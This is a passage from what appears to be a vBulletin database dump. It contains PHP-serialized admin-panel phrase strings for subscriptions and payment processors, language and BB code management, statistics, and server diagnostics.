. \r\n \r\nThe ISAM format does not support repair/optimize so you will need to convert tables to MyISAM before they can be repaired/optimized. \r\n \r\nThe following tables are using the obsolete ISAM format.\";}', 'a:110:{s:28:\"2checkout_order_instructions\";s:103:\"To pay for your subscription via 2Checkout click the button below and follow the onscreen instructions.\";s:6:\"active\";s:6:\"Active\";s:18:\"add_new_paymentapi\";s:19:\"Add New Payment API\";s:20:\"add_new_subscription\";s:20:\"Add New Subscription\";s:8:\"add_user\";s:8:\"Add User\";s:12:\"all_currency\";s:12:\"All Currency\";s:14:\"all_processors\";s:14:\"All Processors\";s:17:\"all_subscriptions\";s:17:\"All Subscriptions\";s:9:\"all_types\";s:9:\"All Types\";s:31:\"allowed_can_access_subscription\";s:47:\"Allowed: Usergroup can access this subscription\";s:6:\"amount\";s:6:\"Amount\";s:40:\"are_you_sure_want_to_delete_paymentapi_x\";s:165:\"Are you sure you want to delete the Payment API called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:42:\"are_you_sure_want_to_delete_subscription_x\";s:166:\"Are you sure you want to delete the subscription called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:11:\"aus_dollars\";s:18:\"Australian Dollars\";s:31:\"authorizenet_order_instructions\";s:109:\"To pay for your subscription using Authorize.Net click the button below and follow the onscreen instructions.\";s:23:\"available_subscriptions\";s:23:\"Available Subscriptions\";s:11:\"cad_dollars\";s:16:\"Canadian Dollars\";s:20:\"can_use_subscription\";s:20:\"Can Use Subscription\";s:25:\"ccbill_order_instructions\";s:100:\"To pay for your subscription via CCBill click the button below and follow the onscreen instructions.\";s:12:\"ccbill_subid\";s:12:\"CCBill SubID\";s:6:\"charge\";s:6:\"Charge\";s:9:\"classname\";s:9:\"Classname\";s:28:\"clickbank_order_instructions\";s:160:\"To pay for your subscription using ClickBank click the button below and follow the onscreen instructions.\";s:4:\"cost\";s:4:\"Cost\";s:8:\"currency\";s:8:\"Currency\";s:34:\"denied_can_not_access_subscription\";s:49:\"Denied: Usergroup cannot access this subscription\";s:53:\"doing_this_will_remove_additional_access_subscription\";s:92:\"Doing this will remove any additional access given to users who purchased this subscription!\";s:8:\"duration\";s:8:\"Duration\";s:23:\"edit_subscription_for_x\";s:26:\"Edit Subscription for %1$s\";s:60:\"edit_usergroup_permissions_for_usergroup_x_in_subscription_y\";s:84:\"Edit Subscription Permissions For Usergroup: %1$s in Subscription %2$s\";s:5:\"euros\";s:5:\"Euros\";s:11:\"expiry_date\";s:11:\"Expiry Date\";s:7:\"failure\";s:7:\"Failure\";s:41:\"here_you_can_select_which_forums_the_user\";s:408:\"Here you can select which forums the user will be able to access once subscribed. Selecting \"yes\" will allow this user access to the forum. Selecting \"default\" will use default permissions settings for their usergroup. (Please note that the permission inheritance system still works here) (Ensure that you have access masks enabled before attempting to use these!)\";s:28:\"length_x_units_y_recurring_z\";s:13:\"%1$s %2$s%3$s\";s:31:\"moneybookers_order_instructions\";s:166:\"To pay for your subscription using MoneyBookers click the button below and follow the onscreen instructions.\";s:9:\"no_change\";s:9:\"No Change\";s:36:\"no_subscribed_discussions_to_display\";s:57:\"There are no subscribed discussions for this time period.\";s:25:\"nochex_order_instructions\";s:154:\"To pay for your subscription using NOCHEX click the button below and follow the onscreen instructions.\";s:5:\"order\";s:5:\"Order\";s:13:\"order_using_x\";s:16:\"Order Using %1$s\";s:19:\"payment_api_manager\";s:19:\"Payment API Manager\";s:10:\"paymentapi\";s:11:\"Payment API\";s:11:\"paypal_only\";s:11:\"PayPal Only\";s:25:\"paypal_order_instructions\";s:154:\"To pay for your subscription using PayPal click the button below and follow the onscreen instructions.\";s:15:\"pounds_sterling\";s:15:\"Pounds Sterling\";s:9:\"processor\";s:9:\"Processor\";s:9:\"recurring\";s:9:\"Recurring\";s:8:\"required\";s:8:\"Required\";s:8:\"reversal\";s:8:\"Reversal\";s:21:\"select_payment_method\";s:21:\"Select Payment Method\";s:34:\"setting_2checkout_secret_word_desc\";s:79:\"The secret word as set within the Look and Feel page of your 2Checkout account.\";s:35:\"setting_2checkout_secret_word_title\";s:21:\"2Checkout Secret Word\";s:37:\"setting_2checkout_twocheckout_id_desc\";s:25:\"Your numerical vendor ID.\";s:38:\"setting_2checkout_twocheckout_id_title\";s:26:\"2Checkout Vendor ID Number\";s:43:\"setting_authorizenet_authorize_loginid_desc\";s:32:\"Your Login ID for Authorize.Net.\";s:44:\"setting_authorizenet_authorize_loginid_title\";s:22:\"Authorize.Net Login ID\";s:45:\"setting_authorizenet_authorize_md5secret_desc\";s:177:\"The MD5 Hash Security key as specified within the Security section of the Authorize.Net merchant account system. (This is not required by default so a blank setting is possible)\";s:46:\"setting_authorizenet_authorize_md5secret_title\";s:21:\"MD5 Hash Security Key\";s:32:\"setting_authorizenet_txnkey_desc\";s:106:\"The transaction key as specified within the Security section of the Authorize.Net merchant account system.\";s:33:\"setting_authorizenet_txnkey_title\";s:29:\"Authorize.Net Transaction Key\";s:32:\"setting_ccbill_clientAccnum_desc\";s:56:\"This is the main account number for your CCBill account.\";s:33:\"setting_ccbill_clientAccnum_title\";s:33:\"CCBill Client Main Account Number\";s:32:\"setting_ccbill_clientSubacc_desc\";s:123:\"This is the four digit code that corresponds to the sub account that you have created within CCBill for use with vBulletin.\";s:33:\"setting_ccbill_clientSubacc_title\";s:32:\"CCBill Client Sub Account Number\";s:28:\"setting_ccbill_formName_desc\";s:118:\"The Form Name Code corresponds to the 3 (or more) digit code that you have created within CCBill for this sub account.\";s:29:\"setting_ccbill_formName_title\";s:26:\"CCBill Form Character Code\";s:28:\"setting_ccbill_password_desc\";s:233:\"This is the password to access the CCBill Datalink server. This is not required to utilize CCBill as a payment processor but it is required if you want subscriptions to be updated when a payment is refunded, voided, or charged back.\";s:29:\"setting_ccbill_password_title\";s:17:\"Datalink Password\";s:30:\"setting_ccbill_secretword_desc\";s:106:\"A secret word can be used to increase the security of accepting CCBill transactions. This is not required.\";s:31:\"setting_ccbill_secretword_title\";s:18:\"CCBill Secret Word\";s:28:\"setting_ccbill_username_desc\";s:233:\"This is the username to access the CCBill Datalink server. This is not required to utilize CCBill as a payment processor but it is required if you want subscriptions to be updated when a payment is refunded, voided, or charged back.\";s:29:\"setting_ccbill_username_title\";s:17:\"Datalink Username\";s:33:\"setting_moneybookers_mbemail_desc\";s:101:\"Please enter your MoneyBookers email, all references to the subscription service will use this email.\";s:34:\"setting_moneybookers_mbemail_title\";s:18:\"MoneyBookers Email\";s:34:\"setting_moneybookers_mbsecret_desc\";s:64:\"Secret Word in lowercase as typed into your Moneybookers Profile\";s:35:\"setting_moneybookers_mbsecret_title\";s:24:\"Moneybookers Secret Word\";s:28:\"setting_nochex_ncxemail_desc\";s:95:\"Please enter your NoChex email, all references to the subscription service will use this email.\";s:29:\"setting_nochex_ncxemail_title\";s:12:\"NoChex Email\";s:27:\"setting_paypal_ppemail_desc\";s:95:\"Please enter your PayPal email, all references to the subscription service will use this email.\";s:28:\"setting_paypal_ppemail_title\";s:12:\"PayPal Email\";s:32:\"setting_paypal_primaryemail_desc\";s:130:\"Your PayPal primary account email that corresponds to the address above, this is required for recurring subscription verification.\";s:33:\"setting_paypal_primaryemail_title\";s:28:\"PayPal Primary Account Email\";s:37:\"setting_worldpay_worldpay_instid_desc\";s:154:\"The Install ID that is generated by the WorldPay CMS for the subscription callback. Please read the manual for instructions on how to change the password.\";s:38:\"setting_worldpay_worldpay_instid_title\";s:24:\"WorldPay Installation ID\";s:39:\"setting_worldpay_worldpay_password_desc\";s:94:\"The password entered during the creation of the subscription callback within the WorldPay CMS.\";s:40:\"setting_worldpay_worldpay_password_title\";s:26:\"WorldPay Callback Password\";s:16:\"shipping_address\";s:16:\"Shipping Address\";s:33:\"showing_subscriptions_x_to_y_of_z\";s:42:\"Showing Subscriptions %1$s to %2$s of %3$s\";s:32:\"showing_transactions_x_to_y_of_z\";s:41:\"Showing Transactions %1$s to %2$s of %3$s\";s:19:\"subscription_length\";s:19:\"Subscription Length\";s:20:\"subscription_manager\";s:20:\"Subscription Manager\";s:24:\"subscription_permissions\";s:24:\"Subscription Permissions\";s:32:\"subscription_permissions_manager\";s:32:\"Subscription Permissions Manager\";s:18:\"supported_currency\";s:18:\"Supported Currency\";s:18:\"supports_recurring\";s:27:\"Supports Recurring Payments\";s:3:\"tax\";s:3:\"Tax\";s:28:\"to_pay_for_your_subscription\";s:148:\"To pay for your subscription, please click the order button next to your preferred payment method and follow the instructions on the following page.\";s:19:\"transaction_details\";s:19:\"Transaction Details\";s:15:\"transaction_log\";s:15:\"Transaction Log\";s:18:\"transaction_lookup\";s:18:\"Transaction Lookup\";s:17:\"transaction_stats\";s:17:\"Transaction Stats\";s:13:\"transactionid\";s:14:\"Transaction ID\";s:18:\"twocheckout_prodid\";s:10:\"2CO ProdID\";s:4:\"type\";s:4:\"Type\";s:10:\"us_dollars\";s:12:\"U.S. Dollars\";s:32:\"validity_periods_marked_indicate\";s:191:\"Validity periods marked * indicate that purchasing this subscription is recurring, this means after the period is complete it will automatically be renewed.\";s:10:\"view_users\";s:10:\"View Users\";s:27:\"worldpay_order_instructions\";s:104:\"To pay for your subscription using WorldPay click the button below and follow the onscreen instructions.\";s:14:\"x_subscription\";s:17:\"%1$s Subscription\";}', 'a:86:{s:16:\"add_new_language\";s:16:\"Add New Language\";s:14:\"add_new_phrase\";s:14:\"Add New Phrase\";s:13:\"all_languages\";s:13:\"All Languages\";s:17:\"all_phrase_groups\";s:17:\"ALL PHRASE GROUPS\";s:12:\"all_products\";s:12:\"All Products\";s:38:\"are_you_sure_want_to_delete_language_x\";s:162:\"Are you sure you want to delete the language called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:36:\"are_you_sure_want_to_delete_phrase_x\";s:160:\"Are you sure you want to delete the phrase called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:26:\"calformat1_format_override\";s:113:\"Birthday Date Format Override Use this to override the default birthday (with Year ) date format \";s:26:\"calformat2_format_override\";s:162:\"Birthday Date Format Override Use this to override the default birthday (without Year ) date formatDO NOT put in a code for the year \";s:14:\"case_sensitive\";s:14:\"Case-Sensitive\";s:17:\"copy_default_text\";s:17:\"Copy Default Text\";s:19:\"create_new_language\";s:19:\"Create New Language\";s:32:\"creating_a_new_language_called_x\";s:44:\"Creating a new language called \'%1$s \'\";s:15:\"custom_language\";s:15:\"Custom Language\";s:13:\"custom_phrase\";s:13:\"Custom Phrase\";s:20:\"date_format_override\";s:333:\"Date Format Override\r\nSee: http://www.php.net/manual-lookup.php?function=strftime \r\nExamples: (if a locale is specified) \r\nEuropean Format (e.g., 25-04-98): %d-%m-%y \r\nDefault Date Format for this Locale: %x\r\n \";s:20:\"date_time_formatting\";s:294:\"Date / Time FormattingIf a locale is defined, you must use the formatting found here , otherwise use the formatting found here \";s:17:\"decimal_separator\";s:192:\"Decimal Separator (The character used to separate integers from floating point number components, such as the . used in 0.01. To specify a space, please use the underscore _ ) \";s:27:\"default_phrase_updated_desc\";s:120:\"Default Phrase Updated in %1$s by %2$s \r\nYour Custom Phrase Last Edited in %3$s by %4$s \";s:12:\"default_text\";s:12:\"Default Text\";s:21:\"default_text_is_empty\";s:76:\"Copying the default text would be tricky, as you haven\'t typed anything yet!\";s:24:\"delete_all_orphans_notes\";s:81:\"You have chosen to delete all orphan phrases. Click the button below to continue.\";s:49:\"deleting_this_language_will_delete_custom_phrases\";s:93:\"Deleting this language will delete any customized phrases you have created for this language.\";s:24:\"download_upload_language\";s:26:\"Download / Upload Language\";s:13:\"edit_settings\";s:13:\"Edit Settings\";s:26:\"edit_translate_x_y_phrases\";s:34:\"Edit / Translate %1$s %2$s Phrases\";s:29:\"enable_directional_markup_fix\";s:29:\"Enable Directional Markup Fix\";s:29:\"find_and_replace_in_languages\";s:29:\"Find and Replace in Languages\";s:19:\"find_orphan_phrases\";s:19:\"Find Orphan Phrases\";s:20:\"find_updated_phrases\";s:20:\"Find Updated Phrases\";s:16:\"general_settings\";s:16:\"General Settings\";s:12:\"html_charset\";s:140:\"HTML Character Set\r\nThis is the value of the \'charset\' attribute for the HTML content type setting in the \'headinclude\' template. \";s:54:\"if_you_delete_this_phrase_translations_will_be_deleted\";s:117:\"If you choose to delete this phrase, you will also lose any translated versions of the phrase in other language sets.\";s:39:\"if_you_would_like_to_remove_this_phrase\";s:39:\"If You Would Like to Remove this Phrase\";s:23:\"ignore_language_version\";s:119:\"Ignore Language Version Use language file even if it was created by a different version of vBulletin? \";s:21:\"image_folder_override\";s:257:\"Button Images Folder Override\r\nUse this to override the button images folder associated with the style being used. By default, this folder is images/buttons. \r\nYou may use <#> to represent the style ID the user is currently using. \";s:24:\"import_language_xml_file\";s:24:\"Import Language XML File\";s:18:\"importing_language\";s:18:\"Importing Language\";s:22:\"include_custom_phrases\";s:22:\"Include Custom Phrases\";s:44:\"insert_into_master_language_developer_option\";s:57:\"Insert into MASTER LANGUAGE (Developer Option) \";s:19:\"is_default_language\";s:19:\"Is Default Language\";s:18:\"just_fetch_phrases\";s:91:\"Just fetch phrases\r\n(No language settings will be included if \'Yes\' is selected) \";s:4:\"keep\";s:4:\"Keep\";s:8:\"keep_all\";s:8:\"Keep All\";s:18:\"keep_orphans_notes\";s:169:\"Shown here are all the translations for the orphan phrases you want to keep. You must choose one translation of each phrase to become the default version of that phrase.\";s:13:\"language_code\";s:234:\"Language Code This is the abbreviation your language uses, such as "en" or "en-US". See here for more information. \";s:16:\"language_manager\";s:16:\"Language Manager\";s:4:\"left\";s:4:\"Left\";s:13:\"left_to_right\";s:13:\"Left to Right\";s:6:\"locale\";s:809:\"LocaleYou can define a locale so that dates are properly translated. The setting for your locale will depend on your server OS and not all locales are supported on all systems. Windows servers need to look here and everyone else needs to look here and here . You must fill in all of the override fields below and use the formatting found here . Examples for windows are \'Chinese\' and \'deu\'. Examples for Linux are \'de_DE\' and \'fr_FR\'. \";s:23:\"logdate_format_override\";s:87:\"Log Date Format OverrideUse this to override the default Admin CP Log format \";s:15:\"master_language\";s:15:\"MASTER LANGUAGE\";s:20:\"no_x_phrases_defined\";s:33:\"There are no %1$s phrases defined\";s:17:\"number_formatting\";s:17:\"Number Formatting\";s:22:\"overwrite_language_dfn\";s:163:\"Overwrite Language (Selecting a language here will cause the imported language to overwrite an existing language. Leave blank to create a new language.) \";s:22:\"overwriting_language_x\";s:34:\"Overwriting Language \'%1$s \'\";s:14:\"phrase_manager\";s:14:\"Phrase Manager\";s:16:\"phrase_name_only\";s:25:\"Phrase Variable Name Only\";s:27:\"phrase_text_and_phrase_name\";s:43:\"Phrase Text and Phrase Variable Name\";s:16:\"phrase_text_only\";s:16:\"Phrase Text Only\";s:25:\"phrase_translation_desc_1\";s:113:\"When inserting a custom phrase, you may also specify the translations into whatever languages you have installed.\";s:25:\"phrase_translation_desc_2\";s:95:\"If you do leave a translation box blank, it will inherit the text from the \'Text to insert\' box\";s:25:\"phrase_translation_desc_3\";s:55:\"You may customize the translations further at any time.\";s:24:\"phrases_to_show_per_page\";s:24:\"Phrases to Show Per Page\";s:8:\"quickref\";s:8:\"QuickRef\";s:21:\"rebuild_all_languages\";s:21:\"Rebuild All Languages\";s:28:\"rebuild_language_information\";s:28:\"Rebuild Language Information\";s:21:\"rebuilding_language_x\";s:24:\"Rebuilding Language %1$s\";s:30:\"registereddate_format_override\";s:102:\"Registration Date Format Override Use this to override the default registration date format \";s:5:\"right\";s:5:\"Right\";s:13:\"right_to_left\";s:13:\"Right to Left\";s:18:\"search_in_language\";s:18:\"Search in Language\";s:17:\"search_in_phrases\";s:17:\"Search in Phrases\";s:14:\"search_phrases\";s:14:\"Search Phrases\";s:30:\"search_translated_phrases_only\";s:161:\"Search Translated Phrases Only\r\nWhen selecting a specific language, select \'Yes\' here to search translated phrases only, excluding untranslated items. \";s:15:\"standard_phrase\";s:15:\"Standard Phrase\";s:14:\"text_direction\";s:14:\"Text Direction\";s:19:\"thousands_separator\";s:179:\"Thousands Separator (The character used to separate thousands in formatted numbers, such as the , used in 1,024. To specify a space, please use the underscore _ ) \";s:20:\"time_format_override\";s:379:\"Time Format Override\r\nSee: http://www.php.net/manual-lookup.php?function=strftime \r\nExamples: (if a locale is specified) \r\nAM/PM Time Format (eg, 11:15 PM): %I:%M %p \r\n24-Hour Format Time (eg, 23:15): %H:%M \r\nDefault Time Format for this Locale: %X\r\n \";s:27:\"title_for_uploaded_language\";s:109:\"Title for Uploaded Language (Leave blank to use the language title specified in the language file) \";s:28:\"updated_default_phrases_desc\";s:315:\"The phrases shown on this page have been updated in the default language since you customized them. \r\n \r\nIt may be necessary for you to revert the custom phrases or otherwise check that they fully support vBulletin %1$s. If you do not do this, some sections of vBulletin may not function! \";s:13:\"view_language\";s:13:\"View Language\";s:13:\"view_quickref\";s:13:\"View QuickRef\";s:12:\"view_summary\";s:12:\"View Summary\";s:9:\"x_phrases\";s:12:\"%1$s Phrases\";s:22:\"x_phrases_containing_y\";s:58:\"%1$s Phrases Containing \'%2$s\' \";}', 'a:27:{s:15:\"add_new_bb_code\";s:15:\"Add New BB Code\";s:37:\"are_you_sure_want_to_delete_bb_code_x\";s:161:\"Are you sure you want to delete the BB code called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:7:\"bb_code\";s:7:\"BB Code\";s:20:\"bb_code_explanations\";s:1375:\"Explanations: \r\nTitle: The title of your tag, which will be used to generate the BB code list . \r\nTag: This is the text for the BB code, which goes inside the square brackets. \r\ne.g. you would use \'b\' for [b] tags, \'url\' (without quotes) for [url] tags. \r\nReplacement: This is the HTML code for the BB code replacement. Make sure that you include \'{param}\' (without the quotes) to insert the text between the opening and closing BB code tags, and \'{option}\' for the parameter within the BB code tag. You can only use {option} if \'Use Option\' is set to yes. \r\ne.g. you would use <b>{param}</b> for tags, <a href=\"{option}\">{param}</a> for [url=xxx] . You will always use \'{param}\', but you will only use \'{option}\' when \"Use Option?\" is \"yes.\" \r\nExample: This is a sample piece of BB code to use as an example for this particular BB code. \r\ne.g. you would use [b]Bold[/b] for [b] tags, [url=http://www.example.com]Example Web Site[/url] for [url] tags \r\nDescription: This is a piece of text to describe the BB code tag. This can include HTML tags if you wish. \r\nUse Option: Setting this option to yes will allow you to create a [tag=option][/tag] style tag, rather than just a [tag][/tag] style tag.\";s:15:\"bb_code_manager\";s:15:\"BB Code Manager\";s:16:\"bb_code_tag_name\";s:16:\"BB Code Tag Name\";s:29:\"bbcode_plaintext_attachment_x\";s:15:\"Attachment %1$s\";s:23:\"bbcode_plaintext_code_x\";s:33:\"Code:\r\n---------\r\n%1$s\r\n---------\";s:23:\"bbcode_plaintext_html_x\";s:33:\"HTML:\r\n---------\r\n%1$s\r\n---------\";s:24:\"bbcode_plaintext_image_x\";s:11:\"Image: %1$s\";s:22:\"bbcode_plaintext_php_x\";s:32:\"PHP:\r\n---------\r\n%1$s\r\n---------\";s:35:\"bbcode_plaintext_quote_username_x_y\";s:55:\"---Quote (Originally by %1$s)---\r\n%2$s\r\n---End Quote---\";s:24:\"bbcode_plaintext_quote_x\";s:34:\"---Quote---\r\n%1$s\r\n---End Quote---\";s:12:\"button_image\";s:12:\"Button Image\";s:17:\"button_image_desc\";s:236:\"Button Image (Optional) If you would like this BB code to appear as a clickable button on the message editor toolbar, enter the URL of an image 21 x 20 pixels in size that will act as the button to insert this BB code. \";s:24:\"disable_bbcode_in_bbcode\";s:35:\"Disable BB Code Within This BB Code\";s:25:\"disable_smilies_in_bbcode\";s:35:\"Disable Smilies Within This BB Code\";s:31:\"disable_urlconversion_in_bbcode\";s:50:\"Disable Automatic Link Parsing Within This BB Code\";s:26:\"disable_wordwrap_in_bbcode\";s:41:\"Disable Word Wrapping Within This BB Code\";s:23:\"enter_text_with_bb_code\";s:27:\"Enter text with BB code(s):\";s:7:\"example\";s:7:\"Example\";s:4:\"html\";s:4:\"HTML\";s:19:\"remove_tag_if_empty\";s:19:\"Remove Tag If Empty\";s:11:\"replacement\";s:11:\"Replacement\";s:17:\"test_your_bb_code\";s:17:\"Test your BB Code\";s:54:\"this_is_how_your_test_appeard_after_bb_code_formatting\";s:54:\"This is how your text appears after BB code formatting\";s:10:\"use_option\";s:12:\"Use {option}\";}', 'a:19:{s:14:\"date_ascending\";s:14:\"Date Ascending\";s:15:\"date_descending\";s:15:\"Date Descending\";s:21:\"include_empty_results\";s:21:\"Include empty results\";s:18:\"most_popular_forum\";s:18:\"Most popular forum\";s:19:\"most_replied_thread\";s:22:\"Most replied to thread\";s:18:\"most_viewed_thread\";s:18:\"Most viewed thread\";s:19:\"new_post_statistics\";s:19:\"New Post Statistics\";s:21:\"new_thread_statistics\";s:21:\"New Thread Statistics\";s:13:\"newest_member\";s:27:\"Newest member to the forums\";s:19:\"record_online_users\";s:19:\"Record online users\";s:23:\"registration_statistics\";s:23:\"Registration Statistics\";s:5:\"scope\";s:5:\"Scope\";s:20:\"start_date_after_end\";s:32:\"Start date is after the end date\";s:10:\"top_poster\";s:10:\"Top poster\";s:14:\"top_statistics\";s:14:\"Top Statistics\";s:15:\"total_ascending\";s:15:\"Total Ascending\";s:16:\"total_descending\";s:16:\"Total Descending\";s:24:\"user_activity_statistics\";s:24:\"User Activity Statistics\";s:6:\"weekly\";s:6:\"Weekly\";}', 'a:50:{s:38:\"check_mail_server_configured_correctly\";s:178:\"Check your mail server to ensure it is configured correctly to allow PHP to send mail from it. You should also check your mail server\'s error log for more diagnostic information.\";s:7:\"details\";s:7:\"Details\";s:24:\"email_sent_check_shortly\";s:248:\"No errors were returned while attempting to send the email. Check %1$s shortly to confirm you\'ve received the email. If you don\'t receive the email, try sending the test to a different address. If that fails, check your mail server\'s configuration.\";s:20:\"email_test_explained\";s:238:\"The goal of this test is to determine whether any vBulletin or PHP settings must be changed to allow the sending of email through vBulletin. To begin, simply enter an email address that you have the ability to access and click Send Email.\";s:22:\"file_contents_mismatch\";s:39:\"File does not contain expected contents\";s:35:\"file_copied_to_tmp_dir_now_readable\";s:160:\"After copying the file into the specified \"Safe Mode Temp Directory\", it became readable. Uploads will function, but only when uploading in safe mode is enable.\";s:37:\"file_copied_to_tmp_dir_now_unreadable\";s:218:\"After copying the file into the specified \"Safe Mode Temp Directory,\" it remained unreadable. PHP\'s safe_mode setting must be disabled for uploads to function. You will need to contact your host for this to be changed.\";s:14:\"file_not_found\";s:14:\"File not found\";s:17:\"file_not_readable\";s:17:\"File not readable\";s:19:\"file_not_recognized\";s:40:\"File not recognized as part of vBulletin\";s:23:\"file_upload_setting_off\";s:165:\"File uploads have been turned off via PHP\'s file_uploads setting. This can only be handled by contacting your host and asking them to enable the file_upload setting.\";s:34:\"file_version_mismatch_x_expected_y\";s:48:\"File version mismatch: found %1$s, expected %2$s\";s:23:\"file_versions_explained\";s:290:\"This function will list each of your vBulletin files that is tagged with a different version than your forum is currently at, which is %1$s . \r\n \r\nThis tool is intended to verify the integrity of your vBulletin files and only scans files with a limited number of extensions.\";s:34:\"mail_function_errors_returned_were\";s:72:\"The following errors were outputted by PHP when attempting to send mail:\";s:28:\"mail_function_returned_error\";s:69:\"The mailing function returned an error while trying to send the mail.\";s:23:\"mod_security_ajax_issue\";s:18:\"AJAX Unicode Issue\";s:25:\"mod_security_problem_desc\";s:267:\"The above setting will indicate if mod_security is preventing some AJAX requests from being submitted to vBulletin. If this shows Yes then you either need to disable mod_security or change the AJAX settings with the vBulletin Options and disable Problematic features.\";s:13:\"module_loaded\";s:13:\"Module Loaded\";s:12:\"mysql_status\";s:12:\"MySQL Status\";s:15:\"mysql_variables\";s:15:\"MySQL Variables\";s:32:\"no_errors_occured_opening_upload\";s:63:\"No errors occurred while opening the uploaded file for reading.\";s:22:\"open_basedir_in_effect\";s:306:\"PHP\'s open_basedir setting has been set to %1$s. The uploaded file was stored outside of this directory and is not readable. You will need to contact your host and ask them to specify upload_tmp_dir with a directory inside %1$s. Note that PHP must be able to read and write to this directory.\";s:4:\"pass\";s:4:\"Pass\";s:17:\"payment_api_tests\";s:17:\"Payment API Tests\";s:22:\"pertinent_php_settings\";s:22:\"Pertinent PHP Settings\";s:23:\"pertinent_smtp_settings\";s:23:\"Pertinent SMTP Settings\";s:26:\"problematic_server_modules\";s:29:\"Problematic Webserver Modules\";s:36:\"problematic_server_modules_explained\";s:134:\"Some server modules can cause asymptomatic problems with vBulletin, these diagnostics will help identify if the modules are installed.\";s:21:\"safe_mode_dir_not_dir\";s:157:\"The \"Safe Mode Temp Directory\" you have specified (%1$s) does not appear to be a directory. Please specify the correct directory and attempt this test again.\";s:28:\"safe_mode_enabled_no_tmp_dir\";s:155:\"You have safe mode uploading enabled but have not specified \"Safe Mode Temp Directory\". Please specify one on the options page and attempt this test again.\";s:23:\"safe_mode_not_writeable\";s:189:\"The \"Safe Mode Temp Directory\" you have specified (%1$s) is not writeable by PHP. You will most likely need to make this directory world writeable. Correct this and attempt this test again.\";s:15:\"scanned_x_files\";s:18:\"Scanned %1$s files\";s:23:\"server_information_desc\";s:154:\"While not exactly a test, this function is helpful for tracking down server issues. Simply select the appropriate type of information and submit the form.\";s:13:\"smtp_username\";s:14:\"SMTP Username:\";s:20:\"suhosin_problem_desc\";s:118:\"Suhosin can limit the amount of data submitted and encrypt cookies causing problems with several aspects of vBulletin.\";s:21:\"suspect_file_versions\";s:21:\"Suspect File Versions\";s:18:\"system_information\";s:18:\"System Information\";s:12:\"table_status\";s:12:\"Table Status\";s:20:\"test_cannot_continue\";s:25:\"The test cannot continue.\";s:31:\"test_indeterminate_contact_host\";s:295:\"The test was indeterminate. There were problems reading the uploaded file, but none of PHP\'s settings were identified as causing a problem. At this point, you should attempt to attach a file to a post. If that fails, contact your host as no one will know their own server setup better than them.\";s:25:\"turn_safe_mode_option_off\";s:93:\"You should be able to turn off the \"Upload In Safe Mode?\" option without any adverse effects.\";s:28:\"unable_to_copy_attached_file\";s:171:\"The attached file could not be copied to %1$s. PHP\'s safe_mode setting must be disabled for uploads to function. You will need to contact your host for this to be changed.\";s:28:\"unable_to_find_attached_file\";s:70:\"The attached file\'s temporary location (%1$s) could not be found. %2$s\";s:24:\"unable_to_open_directory\";s:24:\"Unable to open directory\";s:16:\"unable_to_open_x\";s:32:\"Unable to open file: %1$s \";s:16:\"upload_test_desc\";s:259:\"This test\'s purpose is to determine if there are any vBulletin/PHP options you need to change for uploads to function correctly. To begin, simply attach a small file using the box below and submit the form. vBulletin will not save the attached file in anyway.\";s:20:\"vbulletin_email_test\";s:20:\"vBulletin Email Test\";s:24:\"vbulletin_email_test_msg\";s:590:\"You are receiving this email because your email address was entered as an email test at %1$s.\r\n\r\nThe first step of this email test script has been completed. However, a formatting test is still necessary:\r\n\r\nA paragraph break.\r\nA single line break.\r\n\r\nAnother paragraph break.\r\nAnother single line break.\r\nAnother single line break.\r\n\r\nIf the above lines look correct, you are finished. The email features on your server are setup correctly.\r\nIf this email is run together on one line, there is possibly a configuration error with your mail server. Please ensure it is configured correctly.\";s:26:\"vbulletin_email_test_withf\";s:40:\"vBulletin Email Test (With -f Parameter)\";s:7:\"version\";s:7:\"Version\";}', 'a:155:{s:43:\"affected_accounts_that_were_last_active_x_y\";s:67:\"Affected accounts that were last active %1$s: %2$s \";s:19:\"affected_accounts_x\";s:23:\"Affected Accounts: %1$s\";s:18:\"anon_server_survey\";s:23:\"Anonymous Server Survey\";s:23:\"anon_server_survey_desc\";s:891:\" In order to provide products that are well-suited to the servers and sites that currently run vBulletin,\r\n we are running a survey to find out what kind of capabilities our customers\' servers have, and what scale\r\n of bulletin boards they run.
\r\n By submitting this survey to vBulletin.com you will help us to ensure that our forthcoming releases\r\n are both compatible with and make full use of the services available on your servers.
\r\n There is some data at the bottom of the form that is optional for you to submit. This information\r\n describes your own board, and lets us know how busy etc. your site is.
\r\n The information submitted in this survey is entirely anonymous and no information that can identify\r\n the site that posted the survey data will be collected.
\";s:14:\"apache_modules\";s:14:\"Apache Modules\";s:24:\"are_you_sure_empty_index\";s:48:\"Are you sure you wish to empty the search index?\";s:30:\"building_attachment_thumbnails\";s:212:\"Building Attachment ThumbnailsIf you receive a fatal error or if the process seems to hang, you will need to delete the last attachment listed on the screen then refresh this window. \";s:26:\"building_avatar_thumbnails\";s:214:\"Building Avatar ThumbnailsIf you receive a fatal error or if the process seems to hang, you will need to delete the last avatar thumbnail listed on the screen then refresh this window. \";s:19:\"building_post_cache\";s:19:\"Building Post Cache\";s:21:\"building_search_index\";s:21:\"Building Search Index\";s:26:\"building_sgicon_thumbnails\";s:219:\"Building Social Group Icon ThumbnailsIf you receive a fatal error or if the process seems to hang, you will need to delete the last thumbnail listed on the screen then refresh this window. \";s:36:\"change_output_signatures_empty_cache\";s:156:\"If you have made changes that affect the output of signatures, you may use this to empty the cache and force signatures to be rebuilt with the new settings.\";s:20:\"character_sets_usage\";s:21:\"Character Sets in Use\";s:33:\"check_accounts_with_last_activity\";s:33:\"Check Accounts with Last Activity\";s:23:\"check_affected_accounts\";s:23:\"Check Affected Accounts\";s:22:\"check_styles_no_parent\";s:31:\"Check For Styles With No Parent\";s:28:\"confirm_prefix_change_x_to_y\";s:53:\"Confirm Table Prefix Change (From \'%1$s\' to \'%2$s\')\r\n\";s:24:\"delete_duplicate_threads\";s:24:\"Delete Duplicate Threads\";s:8:\"delete_x\";s:11:\"Delete %1$s\";s:35:\"deleted_orphan_threads_successfully\";s:35:\"Deleted Orphan Threads Successfully\";s:10:\"email_from\";s:10:\"Email From\";s:30:\"email_permanently_banned_users\";s:196:\"Email Permanently Banned Users\r\nIf you select no, permanently banned users\' passwords will be reset, but they will not receive an email. Temporarily banned users will always be emailed. \";s:13:\"email_subject\";s:13:\"Email Subject\";s:21:\"email_to_send_at_once\";s:21:\"Email to 